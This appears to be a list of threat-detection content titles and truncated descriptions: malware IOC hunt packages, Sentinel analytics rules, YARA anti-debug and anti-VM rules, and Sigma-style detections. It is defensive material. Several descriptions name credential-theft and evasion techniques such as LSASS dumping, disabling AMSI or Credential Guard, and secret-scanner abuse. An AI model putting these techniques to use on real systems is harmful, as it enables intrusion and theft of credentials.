Hunt package for 9 IOCs associated with Unknown Stealer
Hunt package for 10 IOCs associated with Nanocore RAT
Hunt package for 2 IOCs associated with Remcos
Hunt package for 5 IOCs associated with ValleyRAT
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence mechanisms to maintain long-term access.
Hunt package for 44 malicious URLs tagged as 32-bit
Hunt package for 40 malicious URLs tagged as ClearFake
Hunt package for 9 malicious URLs tagged as malware_download
Hunt package for 2 malicious URLs tagged as mirai
Hunt package for 5 malicious URLs tagged as Mozi
'The alert shows users that join a Zoom meeting from a time zone other than the one the meeting was created in. You can also whitelist known good time zones in the tz_whitelist value using the tz data
Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.
Affect hook table
'This alerts when end to end encryption is disabled for Zoom meetings.'
'Identifies accounts that are added to a privileged group and then quickly removed, which could be a sign of compromise.'
'Identifies whenever a user account has the setting "Password Never Expires" in the user account properties selected. This is indicated in Security event 4738 in the EventData item labeled UserAccount
'Detects successful signins using single factor authentication where the device, location, and ASN are abnormal. Single factor authentications pose an opportunity to access compromised accounts, inve
'Identifies connection attempts (success or fail) from clients with very short or very long User Agent strings and with less than 100 connection attempts.'
Checks if being debugged
Checks for the presence of known debug tools
Anti-Sandbox checks for Anubis
Anti-Sandbox checks for CWSandbox
Anti-Sandbox checks for Joe Sandbox
Anti-Sandbox checks for Sandboxie
Anti-Sandbox checks for ThreatExpert
AntiVM checks for Bios version
AntiVM checks for VirtualBox
AntiVM checks for VMWare
Detects when there is a login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from compromised accounts
'Detects when a privileged user account successfully authenticates from a location, device or ASN that another admin has not logged in from in the last 7 days. Privileged accounts are a key target f
YARA rule: Check_FindWindowA_iat
YARA rule: Check_OutputDebugStringA_iat
YARA rule: check_RaiseException_iat
YARA rule: Check_unhandledExceptionFiler_iat
Anti-debug process memory working set size check
Disable AntiVirus
Disable Firewall
Disable Registry editor
Disable User Access Control
'Identifies when failed logon attempts are 20 or higher during a 10 minute period (2 failed logons per minute minimum) from valid account.'
'Identifies when 20 or more failed attempts from a given client IP in 1 minute occur on the IIS server. This could be indicative of an attempted brute force. This could also simply indicate a misconfi
'Identifies an interrupted sign-in session from a country the user has not sign-in before in the last 7 days, where the password was correct. Although the session is interrupted by other controls such
'Identifies when a user account was created and then added to the builtin Administrators group in the same day. This should be monitored closely and all additions reviewed.'
'Detects a successful logon by a privileged account from an ASN not logged in from in the last 14 days. Monitor these logons to ensure they are legitimate and identify if there are any similar sign
'Detects when there is a Service Principal login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from
'This query identifies whether an Active Directory user object was assigned a service principal name which could indicate that an adversary is preparing for performing Kerberoasting. This query check
'This query looks for new processes being spawned by the Exchange UM service where that process has not previously been observed before. Reference: https://www.microsoft.com/security/blog/2021/03/02/
'This query looks for errors that may indicate that an attacker is attempting to exploit a vulnerability in the service. Reference: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targetin
'Identifies a match across various data feeds for named pipe IOCs related to the Solorigate incident. For the sysmon events required for this detection, logging for Named Pipe Events needs to be conf
Hunt package for 163 IOCs associated with ClearFake
Hunt package for 4 IOCs associated with KongTuke
Hunt package for 2 IOCs associated with Unknown malware
Hunt package for 2 IOCs associated with StrelaStealer
Hunt package for 28 IOCs associated with Vidar
Hunt package for 36 malicious URLs tagged as 32-bit
Hunt package for 11 malicious URLs tagged as 45-156-87-194
Hunt package for 37 malicious URLs tagged as ClearFake
Hunt package for 2 malicious URLs tagged as elf
Hunt package for 3 malicious URLs tagged as malware_download
The Mirai malware family is a botnet that compromises IoT devices to launch large-scale DDoS
Hunt package for 8 malicious URLs tagged as Mozi
'Identifies when a user account has been added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is an exp
'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
'Identifies when a user account is enabled and then disabled within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
'This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to OMIGOD CVE-2021-38647. OMI is the Linux equivalent of Windows WMI and helps users manage configu
'This detection uses Security events from the "AD FS Auditing" provider to detect suspicious object identifiers (OIDs) as part EventID 501 and specifically part of the Enhanced Key Usage attributes. T
'This query detects modification in the AdminSDHolder in the Active Directory which could indicate an attempt for persistence. AdminSDHolder Modification is a persistence technique in which an attac
YARA rule: Check_Debugger
YARA rule: Check_Dlls
YARA rule: Check_DriveSize
The 'Check_FilePaths
YARA rule: Check_Qemu_Description
YARA rule: Check_Qemu_DeviceMap
YARA rule: Check_UserNames
YARA rule: Check_VBox_Description
The 'Check_VBox_DeviceMap' rule detects potential malicious activity involving VirtualBox device mapping, such as unauthorized device redirection or suspicious
YARA rule: Check_VBox_Guest_Additions
YARA rule: Check_VBox_VideoDrivers
The 'Check_VmTools' YARA rule detects artifacts associated with virtual machine tools, which may indicate evasion techniques or malicious activity in virtualized environments
YARA rule: Check_VMWare_DeviceMap
YARA rule: Check_Wine
'This query uses Sysmon Image Load (Event ID 7) and Process Create (Event ID 1) data to look for COM Event System being used to load a newly seen DLL.'
YARA rule: DebuggerPattern__CPUID
YARA rule: DebuggerPattern__SEH_Inits
YARA rule: DebuggerPattern__SEH_Saves
'This query detects an abuse of the DSRM account in order to maintain persistence and access to the organization's Active Directory. Ref: https://adsecurity.org/?p=1785'
'This query detects domain user accounts creation (event ID 4720) where the username ends with $. Accounts that end with $ are normally domain computer accounts and when they are created the event ID
'Identifies when a recently created Group was added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is
'This query looks for any mass download by a single user with possible file copy activity to a new USB drive. Malicious insiders may perform such activities that may cause harm to the organization. T
'This detection uses Windows security events to detect suspicious access attempts to the registry key of Microsoft Entra ID Health monitoring agent. This detection requires an access control entry (AC
'This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Microsoft Entra ID Health service agents (e.g AD FS). Information from AD H
'This query identifies when a process execution command-line indicates that a registry value is written to allow for later execution a malicious script References: https://www.microsoft.com/security/
'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-
'Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a
'Identifies when an RDP connection is made to multiple systems and above the normal connection count for the previous 7 days. Connections from the same system with the same account within the same day
'This query identifies Active Directory computer objects modifications that allow an adversary to abuse the Resource-based constrained delegation. This query checks for event id 5136 that the Object
'The query looks for source code files being modified immediately after a build process is started. The purpose of this is to look for malicious code injection during the build process. More details:
'A service principal name (SPN) is used to uniquely identify a service instance in a Windows environment. Each SPN is usually associated with a service account. Organizations may have used service acc
'Identifies when an RDP connection is new or rare related to any logon type by a given account today compared with the previous 14 days. RDP connections are indicated by the EventID 4624 with LogonTyp
'Query detects potential lateral movement within a network by identifying when an RDP connection (EventID 4624, LogonType 10) is made to an initial system, followed by a subsequent RDP connection from
YARA rule: SEH_Init
YARA rule: SEH_Save
'Surfaces any Defender Alert for Solorigate Events. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins the DeviceInfo table to clearl
Hunt package for 3 IOCs associated with Mirai
Hunt package for 63 IOCs associated with ClearFake
Hunt package for 7 IOCs associated with AMOS
Hunt package for 7 IOCs associated with Unknown malware
The "Unknown Loader" malware is a downloader that
The "Unknown Stealer" malware is a data-exfiltration
Hunt package for 2 IOCs associated with AsyncRAT
Hunt package for 2 IOCs associated with Nanocore RAT
Hunt package for 15 IOCs associated with NetSupportManager RAT
Hunt package for 87 IOCs associated with Vidar
Hunt package for 26 malicious URLs tagged as 32-bit
Hunt package for 26 malicious URLs tagged as ClearFake
Hunt package for 30 malicious URLs tagged as elf
Hunt package for 7 malicious URLs tagged as Mozi
Hunt package for 2 malicious URLs tagged as sh
Hunt package for 7 malicious URLs tagged as ua-wget
Possibly employs anti-virtualization techniques
'This query will alert on any sign-ins from devices infected with malware in correlation with workspace deletion activity. Attackers may attempt to delete workspaces containing compute instances afte
Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc. These processes are rarely used for legitimate registry modifica
Detects file creation events indicating NetExec (nxc.exe) execution on the local machine. NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory un
Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
Detects execution of the hacktool NetExec. NetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration In enterpri
'This rule identifies a web request to a URL that holds a file type, including .ps1, .bat, .vbs, and .scr that can be harmful if downloaded. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) an
'This rule identifies a web request with a user agent header known to belong to a crypto miner. This indicates a crypto miner may have infected the client machine.<br>You can add custom crypto mining
'This rule identifies a web request with a user agent header known to belong to a hacking tool. This indicates a hacking tool is used on the host.<br>You can add custom hacking tool indicating User-Ag
'This rule identifies a web request with a user agent header known to belong PowerShell. <br>You can add custom Powershell indicating User-Agent headers using a watchlist, for more information refer t
'This query looks for an account being created from a domain that is not regularly seen in a tenant. Attackers may attempt to add accounts from these sources as a means of establishing persistant ac
'Detects when a Temporary Access Pass (TAP) is created for a Privileged Account. A Temporary Access Pass is a time-limited passcode issued by an admin that satisfies strong authentication requiremen
'Identifies an export of the ADFS DKM Master Key from Active Directory. References: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/, https://cloud.go
'Detects anomalous IP address usage by user accounts and then checks to see if a suspicious Teams action is performed. Query calculates IP usage Delta for each user account and selects accounts where
'Identifies sign-in anomalies from an IP in the last hour, targeting multiple users where the password is correct after multiple attempts'
'Identifies a match for SQL Injection attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.o
'Identifies a match for XSS attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.org/www-pro
'Detects changes to an Application ID URI. Monitor these changes to make sure that they were authorized. Ref: https://docs.microsoft.com/azure/active-directory/fundamentals/security-operations-app
'Detects the redirect URL of an app being changed. Applications associated with URLs not controlled by the organization can pose a security risk. Ref: https://docs.microsoft.com/azure/active-direc
'Identifies if an AV scan fails in Azure App Services.'
'Identifies if an AV scan finds infected files in Azure App Services.'
This detects attempts to manipulate audit policies using auditpol command. This technique was seen in relation to Solorigate attack but the results can indicate potential malicious activity used in di
'This query looks for Microsoft Defender AV detections related to Dev-0530 actors. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
'This query looks for Microsoft Defender AV detections related to Europium actor. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
'This query looks for Microsoft Defender AV detections related to Hive Ransomware. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins
'This query looks for diagnostic settings that are removed from a resource. This could indicate an attacker or malicious internal trying to evade detection before malicious act is performed. If the di
'Identifies when the Azure Run Command operation is executed by a UserPrincipalName and IP Address that has resulted in a recent user entity behaviour alert.'
'Identifies when Azure Run command is used to execute a PowerShell script on a VM that is unique. The uniqueness of the PowerShell script is determined by taking a combined hash of the cmdLets it impo
'Detects changes to an applications sign out URL. Look for any modifications to a sign out URL. Blank entries or entries to non-existent locations would stop a user from terminating a session. Ref
'Detects changes to the ownership of an appplicaiton. Monitor these changes to make sure that they were authorized. Ref: https://learn.microsoft.com/en-gb/entra/architecture/security-operations-ap
'PIM provides a key mechanism for assigning privileges to accounts, this query detects changes to PIM role settings. Monitor these changes to ensure they are being made legitimately and don't confer
'Correlate IPs blocked by a Cisco firewall appliance with successful Microsoft Entra ID signins. Because the IP was blocked by the firewall, that same IP logging on successfully to Entra ID is potenti
'IP addresses of broadband links that usually indicates users attempting to access their home network, for example for a remote session to a home computer.'
'Detects first connection to an unpopular website (possible malicious payload delivery).'
'Detects suspicious user agent strings used by crypto miners in proxy logs.'
'Rule helps to detect empty and unusual user agent indicating web browsing activity by an unusual process other than a web browser.'
'Detects suspicious user agent strings used by known hack tools'
'Rule helps to detect a rare user-agents indicating web browsing activity by an unusual process other than a web browser.'
'It is reccomended that these Categories shoud be blocked by policies because they provide harmful/malicious content..'
'Detects request to potentially harmful file types (.ps1, .bat, .vbs, etc.).'
'Malware can use IP address to communicate with C2.'
'Rule helps to detect Powershell user-agent activity by an unusual process other than a web browser.'
'This query looks for changes to COM registry keys to point to files in C:\Windows\System32\spool\drivers\color\. This can be used to enable COM hijacking for persistence. Ref: https://www.microso
'Detects a Conditional Access Policy being modified by a user who has not modified a policy in the last 14 days. A threat actor may try to modify policies to weaken the security controls in place.
'CreepyDrive uses OneDrive for command and control, however, it makes regular requests to predicatable paths. This detecton will alert when over 20 sequences are observed in a single day.'
'CreepyDrive uses OneDrive for command and control. This detection identifies URLs specific to CreepyDrive.'
'Privileged Identity Management (PIM) generates alerts when there is suspicious or unsafe activity in Microsoft Entra ID (Azure AD) organization. This query will help detect attackers attempts to dis
'This hunting query will alert on any Impossible travel activity in correlation with mailbox permission tampering followed by account being added to a PIM managed privileged group. Ensure this impossi
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th
'Dev-0530 actors are known to encrypt the contents of the victims device as well as renaming the file extensions. This query looks for the creation of files with .h0lyenc extension or presence of rans
This query detects attempts to add attacker devices as allowed IDs for active sync using the Set-CASMailbox command. This technique was seen in relation to Solorigate attack but the results can indica
'Detects a user's consent to an OAuth application being blocked due to it being too risky. These events should be investigated to understand why the user attempted to consent to the applicaiton and
'Identifies a match across various data feeds for hashes and IP IOC related to Europium Reference: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-t
'This query dynamically identifies Exchange servers and then looks for instances where the IIS worker process initiates a call out to a remote URL using either cmd.exe or powershell.exe. This behaviou
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to AWS Console. Uses that list to identify any successful Microsoft Entra ID logons from these IPs with
'Identifies a list of IP addresses with a minimum number (defualt of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful AWS Console logons from these IPs with
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful remote logons to hosts from these IPs
'Identifies a list of IP addresses with a minimum number(default of 5) of failed logon attempts to remote hosts. Uses that list to identify any successful logons to Microsoft Entra ID from these IPs w
'Identifies patterns in the time deltas of contacts between internal and external IPs in Fortinet network data that are consistent with beaconing. Accounts for randomness (jitter) and seasonality suc
'This query detects instances where an attacker has gained the ability to execute code on an ADFS Server through remote WMI Execution. In order to use this query you need to be collecting Sysmon Event
'Detects when a Guest User is added by a user account that has not been seen adding a guest in the previous 14 days. Monitoring guest accounts and the access they are provided is important to detect
'It is possible that a disabled user account is compromised and another account on the same IP is used to perform operations that are not typical for that user. The query filters the SigninLogs for e
'The query below identifies powershell commands used by the threat actor Mango Sandstorm. Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-u
'This detection will identify network requests in HTTP proxy data that contains Base64 encoded IP addresses. After identifying candidates the query joins with DeviceNetworkEvents to idnetify any machi
This query creates a list of IP addresses with the number of failed login attempts to Entra ID above a set threshold ( default of 5 ). It then looks for any successful Palo Alto VPN logins from any
'Matches domain name IOCs related to Forest Blizzard group activity published July 2019 with CommonSecurityLog, DnsEvents and VMConnection dataTypes. References: https://blogs.microsoft.com/on-the-iss
'This content is employed to correlate with Microsoft Defender XDR phishing-related alerts. It focuses on instances where a user successfully connects to a phishing URL from a non-Microsoft network de
'Malware authors will sometimes hardcode user agent string values when writing the network communication component of their malware. Malformed user agents can be an indication of such malware.'
'Identifies a match across various data feeds for domains, hashes and IP IOC related to Mercury Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabiliti
'This query looks for Microsoft Defender for Endpoint detections related to the remote command execution attempts on Azure IR with Managed VNet or SHIR. In Microsoft Sentinel, the SecurityAlerts tabl
'This detection will go over the heartbeats received from the agents of Domain Controllers over the last hour, and will create alerts if the last heartbeats were received an hour ago.'
'This query will determine multiple password resets by user across multiple data sources. Account manipulation including password reset may aid adversaries in maintaining access to credentials and cer
'Often times after the initial compromise the attackers create inbox rules to delete emails that contain certain keywords. This is done so as to limit ability to warn compromised users that they've b
'Identifies when multiple (more than one) users mailboxes are configured to forward to the same destination. This could be an attacker-controlled destination mailbox configured to collect mail from mu
Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vu
'This query looks for writes of PE files to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware, as well as some legitimate programs, and writes of PE files to the f
'The purpose of this content is to identify successful phishing links accessed by users. Once a user clicks on a phishing link, we observe successful network activity originating from non-Microsoft ne
'Identifies contacts with domains names in CommonSecurityLog that might have been generated by a Domain Generation Algorithm (DGA). DGAs can be used by malware to generate rendezvous points that are d
'This rule identifies communication with hosts that have a domain name that might have been generated by a Domain Generation Algorithm (DGA). DGAs are used by malware to generate rendezvous points tha
'This detection looks for the steps required to conduct a UAC bypass using Fodhelper.exe. By default this detection looks for the setting of the required registry keys and the invoking of the process
'This query looks for file hashes and AV signatures associated with Prestige ransomware payload.'
'This query identifies exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893) to the VPN server'
'This content is utilized to identify instances of successful login by risky users, who have been observed engaging in potentially suspicious network activity on non-Microsoft network devices.'
'This detection will alert when RunningRAT URI parameters or paths are detect in an HTTP request. Id the device blocked this communication presence of this alert means the RunningRAT implant is likely
'Identifies attempts to modify registry ACL to evade security solutions. In the Solorigate attack, the attackers were found modifying registry permissions so services.exe cannot access the relevant re
'Detects a Service Principal being assigned an app role that has sensitive access such as Mail.Read. A threat actor who compromises a Service Principal may assign it an app role to allow it to acces
'Detects a privileged role being added to a Service Principal. Ensure that any assignment to a Service Principal is valid and appropriate - Service Principals should not be assigned to very highly p
'Identifies a match across various data feeds for domains related to an actor tracked by Microsoft as Star Blizzard.'
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
' This query will detect when an attempt is made to update an existing user and link it to an guest or external identity. These activities are unusual and such linking of external identities should b
' This query will detect logins from guest account which was recently deleted. For any successful logins from deleted identities should be investigated further if any existing user accounts have been
'This query will detect if user properties of Global Administrator are updated by an existing user. Usually only user administrator or other global administrator can update such properties. Investigat
'This query looks for sign ins by the Microsoft Entra ID Connect Sync account to Azure where properties about the logon are anomalous. This query uses Microsoft Sentinel's UEBA features to detect thes
'This detection identifies high-severity alerts across various Microsoft security products, including Microsoft Defender XDR and Microsoft Entra ID, and correlates them with instances of Google Cloud
'Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical patterns. The query leverages a KQL built-in anomaly detection algorithm to find large deviations from
'Identifies anomalous data transfer to public networks. The query leverages built-in KQL anomaly detection algorithms that detects large deviations from a baseline pattern. A sudden increase in data t
'This query identifies when a new trust monitor event is detected.'
'Anomaly Rules generate events in the Anomalies table. This scheduled rule tries to detect Anomalies that are not usual, they could be a type of Anomaly that has recently been activated, or an infrequ
' The query below identifies creation of unusual identity by the Europium actor to mimic Microsoft Exchange Health Manager Service account using Exchange PowerShell commands Reference: https://www.m
'Detects a URL being added to an application where the domain is not one that is associated with the tenant. The query uses domains seen in sign in logs to determine if the domain is associated with
'This query looks for accounts being created where the name does not match a defined pattern. Attackers may attempt to add accounts as a means of establishing persistant access to an environment, lo
'This query looks for accounts being created that do not have attributes populated that are commonly populated in the tenant. Attackers may attempt to add accounts as a means of establishing persist
'Detects when a guest account in a tenant is converted to a member of the tenant. Monitoring guest accounts and the access they are provided is important to detect potential account abuse. Account
This query monitors for users running Log Analytics queries that contain filters for specific, defined VIP user accounts or the VIPUser watchlist template. Use this detection to alert for users specif
'Identifies instances where Wazuh logged over 400 '403' Web Errors from one IP Address. To onboard Wazuh data into Sentinel please view: https://documentation.wazuh.com/current/cloud-security/azure/in
'This detection will identify network requests in HTTP proxy data that contains Base64 encoded usernames from machines in the DeviceEvents table. This technique was seen usee by POLONIUM in their Runn
Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This character is used as an obfuscation and masquerad
'Identifies instances of a base64 encoded PE file header seen in the process command line parameter. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://ak
'Identifies evidence of brute force activity against a user based on multiple authentication failures and at least one successful authentication within a given time window. Note that the query does no
YARA rule: DebuggerCheck__DrWatson
YARA rule: DebuggerCheck__GlobalFlags
YARA rule: DebuggerCheck__PEB
YARA rule: DebuggerCheck__QueryInfo
YARA rule: DebuggerCheck__RemoteAPI
YARA rule: DebuggerException__ConsoleCtrl
YARA rule: DebuggerException__SetConsoleCtrl
YARA rule: DebuggerException__UnhandledFilter
YARA rule: DebuggerHiding__Active
YARA rule: DebuggerHiding__Thread
YARA rule: DebuggerOutput__String
YARA rule: DebuggerPattern__RDTSC
YARA rule: DebuggerTiming__PerformanceCounter
YARA rule: DebuggerTiming__Ticks
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th
'Identifies callouts to Discord CDN addresses for risky file extensions. This detection will trigger when a callout for a risky file is made to a discord server that has only been seen once in your en
'Identifies IP addresses that may be performing DNS lookups associated with common currency mining pools. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom s
'Identifies IP addresses performing DNS lookups associated with common ToR proxies. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom source that supports th
This rule identifies a source that repeatedly fails to authenticate to a web service (HTTP response code 403). This may indicate a [brute force](https://en.wikipedia.org/wiki/Brute-force_attack) or [c
'This creates an incident in the event a client generates excessive amounts of DNS queries for non-existent domains. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in
'Identifies malware that has been hidden in the recycle bin. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimProcessEvent)'
'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-m
'This detection highlights executables deployed to hosts via either the Default Domain or Default Domain Controller Policies. These policies apply to all hosts or Domain Controllers and best practice
'Identifies clients with a high NXDomain count which could be indicative of a DGA (cycling through possible C2 domains where most C2s are not live). Alert is generated when a new IP address is seen (b
'This query searches for failed attempts to log in from more than 15 various users within a 5 minute timeframe from the same source. This is a potential indication of a password spray attack To use t
'This detection looks for command line parameters associated with the use of Sysinternals sdelete (https://docs.microsoft.com/sysinternals/downloads/sdelete) to delete multiple files on a host's C dri
'Identifies the host and account that executed AdFind by hash and filename in addition to common and unique flags that are used by many threat actors in discovery. To use this analytics rule, make sur
'This query looks for the Sdelete process being run recursively after being deployed to a host via GPO. Attackers could use this technique to deploy Sdelete to multiple host and delete data on them.
YARA rule: SEH__v3
YARA rule: SEH__v4
YARA rule: SEH__vba
YARA rule: SEH__vectored
'Identifies IPs with failed attempts to sign in to one or more disabled accounts signed in successfully to another account. To use this analytics rule, make sure you have deployed the [ASIM normalizat
Identifies SolarWinds SUNBURST and SUPERNOVA backdoor file hash IOCs in File Events To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimFileEven
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
YARA rule: ThreadControl__Context
Hunt package for 108 IOCs associated with ClearFake
Hunt package for 2 IOCs associated with KongTuke
Hunt package for 31 IOCs associated with Unknown malware
Hunt package for 2 IOCs associated with AdaptixC2
Hunt package for 2 IOCs associated with AsyncRAT
Hunt package for 14 IOCs associated with Cobalt Strike
Hunt package for 3 IOCs associated with Havoc
Hunt package for 4 IOCs associated with Meterpreter
Hunt package for 2 IOCs associated with NetSupportManager RAT
Hunt package for 4 IOCs associated with Quasar RAT
Hunt package for 9 IOCs associated with Remcos
Hunt package for 4 IOCs associated with SocksProxyGo
Hunt package for 5 IOCs associated with XWorm
Hunt package for 46 malicious URLs tagged as 32-bit
Hunt package for 32 malicious URLs tagged as ACRStealer
Hunt package for 5 malicious URLs tagged as elf
Hunt package for 4 malicious URLs tagged as malware_download
Hunt package for 2 malicious URLs tagged as mirai
Hunt package for 9 malicious URLs tagged as Mozi
'This query searches for successful user logins from different countries within 3 hours. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimAu
YARA rule: WindowsPE
Detects the use of Python's base64 decoding functions in command line executions on Linux systems. Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is
Detects default file names outputted by the BloodHound collection tool SharpHound
Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities. This may indicate remote command execution through OpenEDR's remote mana
Detects the creation of potentially suspicious files by OpenEDR's ITSMService process. The ITSMService is responsible for remote management operations and can create files on the system through the Pr
Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using
Detects suspicious child process creation by the Notepad++ updater process (gup.exe). This could indicate potential exploitation of the updater component to deliver unwanted malware.
Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations. This could indicate potential exploitation of the updater component to deliver unwanted malware or unwar
Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers, and its modification may indicate an attempt to
Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking invol
Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs
Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs)
Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious
Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. Generally, modifications to the `*\shell\open\command` registry key can
Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.
Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories. These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes o
Detect modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts. Attackers may modify User Shell Folders registry keys to point to
Detects installation of suspicious packages using system installation utilities
Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can
Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can acc
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value. Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications
Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applica
Detects the creation of known offensive powershell scripts used for exploitation
Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Detects the image load of VSS DLL by uncommon executables
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicio
A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe. ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromise
Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS server, creates a file with suspicious file type, indicating that it may be an executable,
Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigg
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged t
